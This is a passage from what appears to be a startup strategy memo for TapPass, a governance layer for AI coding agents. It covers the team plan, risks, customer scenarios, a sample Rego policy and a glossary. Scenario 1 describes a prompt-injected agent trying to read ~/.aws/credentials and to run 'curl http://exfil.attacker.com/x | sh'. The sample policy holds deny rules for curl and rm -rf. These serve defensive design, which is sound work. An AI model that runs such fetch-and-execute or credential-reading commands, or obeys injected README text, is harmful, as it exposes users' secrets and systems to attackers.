Core SubstrateCanonical Manifest, OPA cascade, SSE push, SDK, CLI. Load-bearing.3–5 senior eng + 1 TL
ProvidersPer-target providers across harness, kernel, interpreter rings + cross-cutting layers. Highly parallelizable.3–4 eng (scales out with partnerships)
Control (dashboard)Authoring UX, GitOps, shadow mode, simulation, marketplace, compliance reports.2 frontend + 2 backend + 1 PM
MCP GovernanceProxy / broker, registry, signed allowlists. Parallel from Q2.2 eng + partnerships lead
Intelligence (research)Behavioral baselines, anomaly detection. Stand up Q4.1–2 ML eng + 1 data eng
Go-to-MarketDesign-partner program Q2, enterprise sales Q3+, devrel, compliance partnerships.1 DevRel + 2 AE + 1 SE by Q4

Hire for:

  • Engineers shipped in OPA / Rego, kernel sandboxing, or language VMs. Pedigree: Sigstore, Falco, gVisor, Deno, Wasmer, Istio.
  • Security engineers with CISO-side experience (former IR, former auditor).
  • Compliance counsel part-time consult.

Avoid:

  • Full-stack generalists without systems background.
  • ML-heavy hires for 2026 — Intelligence is a 2027 effort.

  1. Neutrality across runtimes. We compete with no agent framework. "Officially governed by TapPass" is a label every CISO wants on every framework they use.
  2. Three-layer coverage no single-layer tool can match. A competitor coming in from the kernel lacks harness semantics; from the framework layer lacks kernel enforcement.
  3. Open-core distribution flywheel. SDK and CLI are free and obvious. One-line developer onboarding.
  4. Compliance as first-class. Pre-mapped controls. Auditor-ready reports. Six-month enterprise sale → six-week.
  5. Compounding data moat (Intelligence). Cross-customer behavioral baselines. The longer we run, the more valuable we become.
  6. Marketplace-locked mindshare. Policy packs maintained by the community and certified by us. Switching costs.

RiskImpactMitigation
Major agent vendor ships their own governance substrateCompresses our windowMove first with neutrality. Partner deeply. Ship MCP governance before anyone else claims it.
Kernel-sandbox tech shifts under usProvider layer absorbs cost; perception riskSupport multiple kernel-ring providers early (Q3-Q4); maintain macOS/Windows/Linux parity.
Rego continues to be a mass-adoption ceilingDeal velocity capsQ3 authoring UX is explicitly top-priority unlock. NL policy generation, templates, marketplace.
Open-core cannibalizationRevenue cappedMake Control the clear answer for any team > 10 agents. Never gate core enforcement — gate the CISO experience.
Regulatory fragmentationCompliance is a moving targetLiving mappings maintained by domain counsel. Community contribution path.
Telemetry pipeline becomes a privacy liabilityIntelligence blocked in regulated accountsTenant-isolated analytics; on-prem aggregation; opt-in cross-tenant.
Internal over-scopeNothing landsThis memo + quarter-by-quarter plan. Explicit non-goals. Every quarter closes with a ship.

16 · Scenario 1 — Fintech CISO Rolls Out Claude Code to 200 Engineers

Section titled “16 · Scenario 1 — Fintech CISO Rolls Out Claude Code to 200 Engineers”

Persona: Mila, CISO at a mid-market fintech. CTO asked her to "enable Claude Code for all engineers by end of quarter, safely."

Week 1 — Install. MDM post-install hook on every laptop: pip install tappass; tappass configure. Shim claude invocations through tappass run claude. Developers notice nothing different.

Week 2 — Policy authoring. Mila opens Control dashboard. Starts from the "Coding agent on private repo" certified policy pack. Flips on shadow mode for 7 days.

Week 3 — Shadow mode telemetry. Three false positives (legitimate Bash(curl:*) in CI scripts) and one true positive (agent tried ~/.aws/credentials after injected README prompt). Mila tightens the policy, flags suspicious to IR, promotes to enforced.

Week 4 — Enforced rollout. SSE push. All three rings reflect change within 2 seconds.

Week 6 — Auditor visit. Click "Generate SOC 2 CC6.1 report · last 30 days." PDF shows policy versions, per-agent action counts, denied-action examples with replay traces. Audit closed cleanly.

Month 2 — Incident. Developer runs Claude Code on malicious README. LLM is prompt-injected, tries Bash(curl http://exfil.attacker.com/x | sh). Caught at all three rings (harness deny, kernel egress, interpreter limit). Intelligence cross-references with other customers. Pushed policy update within 30 minutes.

Outcome: Claude Code deployed to 200 engineers on plan. SOC 2 closed in days. One incident contained in three rings. Public reference customer.


17 · Scenario 2 — Solo Developer Runs a Governed Agent

Section titled “17 · Scenario 2 — Solo Developer Runs a Governed Agent”

Persona: Dev, indie SaaS builder. Uses Claude Code. Has heard horror stories.

Day 1.

pip install tappass
tappass run --sandbox --tier=worker claude

No server, no account. --tier=worker applies a baked-in default policy. Three rings, zero configuration, two lines of install.

Day 7 — His own policy. Adds Postgres access via override file:

network: { allow_extra: [localhost:5432] }
tools: { allow_extra: ["Bash(psql:*)"] }

One line → three enforcement updates.

Day 30 — Joining a team. Side project becomes a startup. SOC 2 audit a year later. Single flag: tappass login --url .... Local overrides disabled by enterprise-managed layer. Solo → enterprise is configuration, not migration.


18 · Scenario 3 — Healthcare AI Team Ships Production Agent

Section titled “18 · Scenario 3 — Healthcare AI Team Ships Production Agent”

Persona: Aisha, Head of AI at regional healthcare SaaS processing PHI. Triage agent. Legal won't approve SaaS. Audit firm specifically asks about agentic PHI access.

Step 1 — Airgapped deploy. TapPass on-prem via tappass-platform license server inside their VPC. Outbound-only Cloudflare Tunnel. No customer data leaves.

Step 2 — Policy cascade with PHI taint tracking. Once agent reads PHI, session tainted; egress hard-restricted to internal endpoints; tools like WebFetch and Email denied.

Step 3 — Production. Agent runs in gVisor sandbox on K8s. Every action signed under {agent_id, policy_version, session_id}. Three-ring enforcement.

Step 4 — Quarterly HIPAA audit. Click "Generate HIPAA 164.312 report · last quarter." Export shows every PHI access, agent identity, policy version, denied actions. Auditor impressed. Three neighboring hospital deals unblock.


19 · Sample Policy Cascade — One Source, Three Rings

Section titled “19 · Sample Policy Cascade — One Source, Three Rings”

End-to-end: a single central policy enforces consistently at harness, kernel, and interpreter rings.

policies/coding-agent.rego
package tappass.policy
default tier := "worker"
network := { "allow_domains": ["api.anthropic.com", "github.com", "pypi.org"], "deny_categories": ["paste_services", "webhooks"] }
filesystem := { "workspace": input.repo_path, "deny_paths": data.tappass.forbidden_zones.critical }
tools := { "allow": ["Bash(git:*)", "Bash(uv:*)", "Skill(*)"], "deny": ["Bash(curl:*)", "Bash(rm -rf:*)"] }
interpreter:= { "host_functions": ["http_get", "json_parse"], "memory_mb": 128 }
compliance_tags := ["SOC2:CC6.1", "ISO42001:6.2.3"]

OPA evaluates → signed Compiled Policy. Providers consume it.

  • Harness ring (claude-code provider): writes managed settings.json with the allow/deny rules.
  • Kernel ring (openshell provider): writes OpenShell YAML with egress allowlist, FS rules, credential hiding.
  • Interpreter ring (monty provider): writes monty host-function manifest with allowed host functions and limits.
  • LLM Gateway: consumes tools.allow/deny and network.allow_domains to enforce per-call capability scope.
  • MCP Broker: consumes tools.allow/deny and compliance_tags to enforce per-call resource ACLs.

Control plane publishes Compiled Policy v1017. SSE event → all agents apply delta → ACK with version. 100% agent coverage on v1017 within < 5 seconds.

Every engineer and auditor sees one policy. Every enforcement layer is generated, not hand-maintained. Drift is impossible by construction. This is the core architectural claim, proven by a single chain of artifacts.


20 · The First 30 / 60 / 90 Days of Runtime v1

Section titled “20 · The First 30 / 60 / 90 Days of Runtime v1”
  • Lock Manifest schema (forward-compat, versioned).
  • Refactor OPA cascade to emit Manifest as sole output.
  • Design partner signup: 3–5 customers committed.
  • Internal dogfood: every TapPass claude invocation through Runtime v0.

Success: Manifest schema shipped; team uses it daily.

  • Provider 1 (harness ring): Claude Code managed settings.json.
  • Provider 2 (kernel ring): OpenShell YAML.
  • Provider 3 (kernel ring): macOS sandbox-exec profile.
  • SSE push extended to all rings + the LLM Gateway capability-token layer.
  • Dashboard stub.

Success: tappass run --rings=harness,kernel claude works on macOS + Linux. Policy change → both rings within 2 seconds.

Day 61–90 — interpreter ring + design-partner launch

Section titled “Day 61–90 — interpreter ring + design-partner launch”
  • Provider 4 (interpreter ring): monty host-function manifest.
  • Codemode demo end-to-end.
  • Design-partner launch: 3 customers, three rings + LLM Gateway, central Compiled Policy.
  • Public architecture post + case studies + Q3 roadmap kickoff.

Success: End of Q2 with 3 reference customers. Demo: Rego → signed Compiled Policy → three rings + gateway → denial trace.


Commit to Three-Ring tappass run as the Q2 2026 shipping target. The proof-point for every subsequent conversation. Ingredients exist; the demo writes itself; the reframing (containment tool → governance substrate) is what unlocks the CISO-direct sales motion.

Fund MCP Governance as a parallel workstream starting immediately — not after Runtime v1 ships. Category timing matters more than feature depth. If we wait until Q4, we arrive after the category names itself.

Cement neutrality as cultural policy. TapPass picks no winner among agent frameworks. We govern all of them; we ship new providers on day one when new frameworks launch; we say "yes" to every integration request. Shows up in hiring, partnerships, and roadmap.

Runtime stays free forever. Never gate core enforcement. Revenue from Control + Intelligence. The flywheel that makes distribution free and the moat a pure-paid competitor cannot match.

Make TapPass the substrate every enterprise trusts to say "yes" to agentic AI — the neutral, universal, three-ring governance layer that every framework plugs into, every CISO requires, and every regulator recognizes.


  • Agent — LLM-driven process that can invoke tools, make network calls, spawn subprocesses, or execute generated code.
  • Harness ring — in-process enforcement at the agent CLI / framework permission layer (Ring 1).
  • Kernel ring — in-process enforcement at the OS / container / hypervisor layer (Ring 2).
  • Interpreter ring — in-process enforcement at the language VM executing agent-generated code (Ring 3).
  • Cross-cutting layer — between-process enforcement; always compulsory. Two of them: LLM Gateway (every prompt + response) and MCP Broker (every tool call). See ADR 0001.
  • Codemode — letting the LLM write code (Python, JS) to accomplish tasks.
  • MCP — Model Context Protocol; standard tool-call wire format.
  • OPA / Rego — policy engine TapPass uses; Rego is the language.
  • Policy — Rego rule set authored by an operator; ecosystem-agnostic; the single source of truth.
  • Compiled Policy — canonical, signed, versioned IR emitted by the OPA cascade. Content organized by aspect (network / filesystem / tools / interpreter / budget / compliance), not by ring. See ADR 0003. Operational alias: Keyring (file on disk, SDK class).
  • Trust tier — coarse capability level (observer, worker, standard, full).
  • Target — specific implementation that fills a ring on a particular platform (e.g. nono, OpenShell, gVisor for the kernel ring).
  • Provider — per-target plug-in (renderer). Pure function provider(compiled_policy, capabilities) → target_config. Like Terraform providers. See ADR 0002. Replaces deprecated "Adapter" framing.
  • Runtime — operator-authored recipe combining one provider per ring + LLM Gateway / MCP Broker config. Sandboxes are bound to runtimes.
  • Sandbox — a logical agent installation: identity + a Runtime instance.
  • Cascade — three-level policy merge: org floor → project floor → agent override. Strictest-wins.
  • Compliance pack — pre-built quick-start bundle of authoring conveniences + Rego templates targeting one regulation (EU AI Act, OWASP LLM, GDPR, …).
  • Capability token — ES256-signed token authorizing scoped operations on the gateway / MCP broker. Short TTL (5 min).
  • Control plane / Data plane — TapPass server side / TapPass-governed agent runtime.
  • Push / Pull / Reconcile — control-loop modes. Push = SSE broadcast; Pull = HTTP fetch (boot, reconnect, heartbeat); Reconcile = background loop catching drift.
  • Agent registry / state store — what the control plane knows: desired vs. applied Compiled Policy version per agent.
  • MCS — Minimum Credible Substrate — four-piece v1 deliverable; see ../build/minimum-credible-substrate.md.
  • tappass/tappass/sandbox/ — OpenShell, trust tiers, forbidden zones, exfil blocklist, policy push, credential monitor.
  • tappass-sdk/tappass/sandbox.py — SDK SandboxManager; SSE listener; LLM env-var injection.
  • tappass-sdk/tappass/_cli.pytappass run implementation.
  • tappass/config/policies/ — reference OPA policies; tenant overrides.
  • tappass-platform/ — airgapped license server.

End of memo. TapPass · 2026-04-28 · v3.0